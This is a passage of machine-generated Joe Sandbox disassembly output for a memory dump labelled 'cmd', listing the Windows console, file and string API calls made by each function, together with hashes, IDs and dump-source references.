                                                                                        • Opcode Fuzzy Hash: 3fbdafa0dbe6fc3df8e493fdcfedad6bdb1c58ef36de90ad23ad2b1e390f98a3
                                                                                        • Instruction Fuzzy Hash: C151D735A006299BCF24AF699C847AE73A5EF54314F1981A9E909D7240FB70DD45CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D89AC2
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00D89B22
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00D89B32
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00D89BAD
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00D89BB8
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00D89BCB
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D89BF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$CurrentDirectoryModememset$Last
                                                                                        • String ID:
                                                                                        • API String ID: 1725644760-0
                                                                                        • Opcode ID: adf5bba65fc031d89bcfd04faf6c9e9ee52add70f528b8674f984a1c3943276b
                                                                                        • Instruction ID: 31c861b32d2c1a052fafff781f13cb21605ef7f2fe2797fc5330ba6137c1b476
                                                                                        • Opcode Fuzzy Hash: adf5bba65fc031d89bcfd04faf6c9e9ee52add70f528b8674f984a1c3943276b
                                                                                        • Instruction Fuzzy Hash: 68417D31A01318ABDF14DBA4EC95AEEB7B4EF59714F088199E805E7250EB34EA40CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00D8B717
                                                                                        • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00D8B72A
                                                                                        • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00D8B7FC
                                                                                          • Part of subcall function 00D68235: _get_osfhandle.MSVCRT ref: 00D6824E
                                                                                          • Part of subcall function 00D68235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68256
                                                                                          • Part of subcall function 00D68235: _get_osfhandle.MSVCRT ref: 00D68264
                                                                                          • Part of subcall function 00D68235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6826C
                                                                                        • memset.MSVCRT ref: 00D8B76D
                                                                                        • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00D8B788
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                        • String ID: <
                                                                                        • API String ID: 1664749912-4251816714
                                                                                        • Opcode ID: 5d7f29a4b93bcd4dfa380c397bbc823b8dc0a04b85e284645827df15c71e6f95
                                                                                        • Instruction ID: c5aca463dd7f7a9abd5591357db32d5fa759b1b0bed6c3c734c68bfaeb195e39
                                                                                        • Opcode Fuzzy Hash: 5d7f29a4b93bcd4dfa380c397bbc823b8dc0a04b85e284645827df15c71e6f95
                                                                                        • Instruction Fuzzy Hash: AC310A75D00309AFDB11EFA9D885ADEBBB8EF48354F144116E905E7350E7309A45CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68203
                                                                                        • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D6820E
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D68229
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0AB
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0C1
                                                                                        • fprintf.MSVCRT ref: 00D7B0D5
                                                                                        • fflush.MSVCRT ref: 00D7B0E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4271573189-0
                                                                                        • Opcode ID: bbf95e3d898442d14b77d87dc58acc2e9cd42b6be42477d321b9ab5b2e6a0986
                                                                                        • Instruction ID: a1e72b3563f7ed78a25909ec0cce25b9b5898f1ea9774fc95c5d4835ff87e9f2
                                                                                        • Opcode Fuzzy Hash: bbf95e3d898442d14b77d87dc58acc2e9cd42b6be42477d321b9ab5b2e6a0986
                                                                                        • Instruction Fuzzy Hash: A5014F31105310FFDB016BA8ED0EBAA7B68EB0A325F104745F125D23E2DBB54A45DB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D73D30
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00D73E3D
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D73E88
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$FullNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 3158150540-0
                                                                                        • Opcode ID: 0f3464f32233361b679bef313a586dc279af2139073e34ab24ff3f0984230009
                                                                                        • Instruction ID: 9c392d0e99858d14060759cf20049ec0351c29af786e22dc0b5fde562ae42fe5
                                                                                        • Opcode Fuzzy Hash: 0f3464f32233361b679bef313a586dc279af2139073e34ab24ff3f0984230009
                                                                                        • Instruction Fuzzy Hash: C1029235A011159BCB35DF68DC957B9B3B1FF48310F1882A9E84E97250E734AE82DF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,335C4BB4,00000001,?), ref: 00D6ADB6
                                                                                          • Part of subcall function 00D75A2E: memset.MSVCRT ref: 00D75A5A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • towupper.MSVCRT ref: 00D6B0E3
                                                                                          • Part of subcall function 00D6E950: memset.MSVCRT ref: 00D6E9A0
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6E9FC
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6EA14
                                                                                          • Part of subcall function 00D6E950: _wcsicmp.MSVCRT ref: 00D6EA80
                                                                                        • wcschr.MSVCRT ref: 00D6AED2
                                                                                        • wcsncmp.MSVCRT(00000000,00D622A8,00000004,00000002,00007FE7), ref: 00D6B016
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00D7CC6C
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D7CCCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                        • String ID:
                                                                                        • API String ID: 4198873954-0
                                                                                        • Opcode ID: 5a786e36165d6c1b903080b908a95c98697689017cf3f7b7b96fdbeab3053f74
                                                                                        • Instruction ID: 73811a37b7a986b526409c7971ec0013ad377ca31db0af9405d9ab60d6cb33cb
                                                                                        • Opcode Fuzzy Hash: 5a786e36165d6c1b903080b908a95c98697689017cf3f7b7b96fdbeab3053f74
                                                                                        • Instruction Fuzzy Hash: F1B12871A002158BCB24AF2CC89577A7364EF41310F188169E98EE7291FB70DD85CBB7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7858D
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D78595
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00D785D4
                                                                                        • _get_osfhandle.MSVCRT ref: 00D785ED
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D785F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                        • String ID:
                                                                                        • API String ID: 1066134489-0
                                                                                        • Opcode ID: f76382055faf7407b95527e2c4b6ee92d98f15700b83f20d8a8eb8f639af2a3f
                                                                                        • Instruction ID: 00830ead27a367ef1ca39a81d31f4cbfb6d3bbf42e976ab50d30f27d3abc06fa
                                                                                        • Opcode Fuzzy Hash: f76382055faf7407b95527e2c4b6ee92d98f15700b83f20d8a8eb8f639af2a3f
                                                                                        • Instruction Fuzzy Hash: E341B631A40311ABCF249F78D88DA6EB7A5EB40304F18856AE84ADB285FE70DD40DA71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _tell.MSVCRT ref: 00D6B7F9
                                                                                        • _close.MSVCRT ref: 00D6B82C
                                                                                        • memset.MSVCRT ref: 00D6B8CC
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00D6B936
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D6B947
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6B96D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1380661413-0
                                                                                        • Opcode ID: 6b1913007286cd989b905ffee2a03be5422b4da0895ce8f7b420a63ed1256c06
                                                                                        • Instruction ID: f0a35452641e3109986fa22d27bf990837f4ee08a84f389cf2c3b12964ec80f4
                                                                                        • Opcode Fuzzy Hash: 6b1913007286cd989b905ffee2a03be5422b4da0895ce8f7b420a63ed1256c06
                                                                                        • Instruction Fuzzy Hash: D441B0709043009BDB309F68D84832AB7E6EB85324F18592EE899D73A0E774DC85CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilterSleepXcpt_amsg_exit_inittermexit
                                                                                        • String ID:
                                                                                        • API String ID: 2369047465-0
                                                                                        • Opcode ID: 4d721b8f6c3055026e2a72e0a45e88ba9a276a6caacec5bae595169215ce5ac8
                                                                                        • Instruction ID: fdfc1f74ca722ecb9ece0d4622759cd51d0404d56604c22f610a378d63db665c
                                                                                        • Opcode Fuzzy Hash: 4d721b8f6c3055026e2a72e0a45e88ba9a276a6caacec5bae595169215ce5ac8
                                                                                        • Instruction Fuzzy Hash: AA31F075A44711DFEB21AF64EC4A7297BA0EB48B24F248529E609D73A0FB30D840CF70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67F7C
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00D67FC0
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D67FF3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6800C
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7B05A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DriveInformationTypeVolume
                                                                                        • String ID:
                                                                                        • API String ID: 285405857-0
                                                                                        • Opcode ID: 167a446262bb265d3f96e8c070b49af1601c14f94333851de31c51e064775eb4
                                                                                        • Instruction ID: 0792c76714d8b9677201b876b63bdb9688990d411450719d93662dba92aa5676
                                                                                        • Opcode Fuzzy Hash: 167a446262bb265d3f96e8c070b49af1601c14f94333851de31c51e064775eb4
                                                                                        • Instruction Fuzzy Hash: 43318171A10209ABDF24CBA9DC85AEFB7B8FF09354F04495AE405E2250EB34DD44CB31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,00DA0AF0,00000002,?,?,00D7A669,%s %s ,?,?,00000000), ref: 00D699DC
                                                                                        • _get_osfhandle.MSVCRT ref: 00D699EC
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D7A669,%s %s ,?,?,00000000), ref: 00D699F4
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D69A09
                                                                                          • Part of subcall function 00D69B3B: _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                          • Part of subcall function 00D69B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                          • Part of subcall function 00D69B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                        • String ID:
                                                                                        • API String ID: 4057327938-0
                                                                                        • Opcode ID: 4f5375c707ce285a29c0984a64ec9b211859a91a0f298386ec46e4e8d278bcd8
                                                                                        • Instruction ID: d9d4943581ee7ec86d4ffda2c10ee6871cbe6fa285a14a8ada14d6bea944b566
                                                                                        • Opcode Fuzzy Hash: 4f5375c707ce285a29c0984a64ec9b211859a91a0f298386ec46e4e8d278bcd8
                                                                                        • Instruction Fuzzy Hash: 8C212732344315AFD7386BB85C9AB3A629CDB85755F18503EFA0AC6281FFB0CC0486B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DA0AF0,?,?,00000000), ref: 00D7C0BC
                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,00001000,00D9A7F0,00002000,00000000,00000000,00DA0AEE), ref: 00D7C0DC
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,00000000,?,00000000), ref: 00D7C0FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3249344982-0
                                                                                        • Opcode ID: eb73e1ae728e0d214c2036382e80ebd49c1a7e581956eb3d95ebf74d7c7bac81
                                                                                        • Instruction ID: 2bc9bfe6f9eaeaea13c4ea058b7d3737d5d2fa44ad78cee7494df6386a5065ed
                                                                                        • Opcode Fuzzy Hash: eb73e1ae728e0d214c2036382e80ebd49c1a7e581956eb3d95ebf74d7c7bac81
                                                                                        • Instruction Fuzzy Hash: DE21A1B2650301BFEF204B68AC99F6BBB7DEB05750F104125F901E2290E7B09D00C7B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • _wcsicmp.MSVCRT ref: 00D875AC
                                                                                        • _wcsicmp.MSVCRT ref: 00D875CB
                                                                                        • _wcsicmp.MSVCRT ref: 00D875F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpwcschr$iswspace
                                                                                        • String ID: KEYS$LIST$OFF
                                                                                        • API String ID: 3924973218-4129271751
                                                                                        • Opcode ID: 14b374403b5e8c3a47cce99598f13b6cf0b35ddac13eba59d957edb4ca90baa2
                                                                                        • Instruction ID: 97796af8540248eea8abc1848a90aa45783b935e480370a2c68f37528dd617bb
                                                                                        • Opcode Fuzzy Hash: 14b374403b5e8c3a47cce99598f13b6cf0b35ddac13eba59d957edb4ca90baa2
                                                                                        • Instruction Fuzzy Hash: A0113A3160C701ABD31977299C4B867B798FBC5764379405EF506962C0EF60DA41C375
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D6DDD6
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000001), ref: 00D6DDE5
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D6DDF0
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6DDF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 513048808-0
                                                                                        • Opcode ID: 8f02b313cc2f222fa99e49d3c0bd856e685d86ae0d85b7874fa3d4aa3485a0e2
                                                                                        • Instruction ID: 58b5b2f938c7730f559a61db37abc63323715bea54e1e162fe8f58b91d52bcaa
                                                                                        • Opcode Fuzzy Hash: 8f02b313cc2f222fa99e49d3c0bd856e685d86ae0d85b7874fa3d4aa3485a0e2
                                                                                        • Instruction Fuzzy Hash: 0B11E333D04350ABD71157A8AD8CB7A36ADE747328F290316E851D22A0D7758D05DBF2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
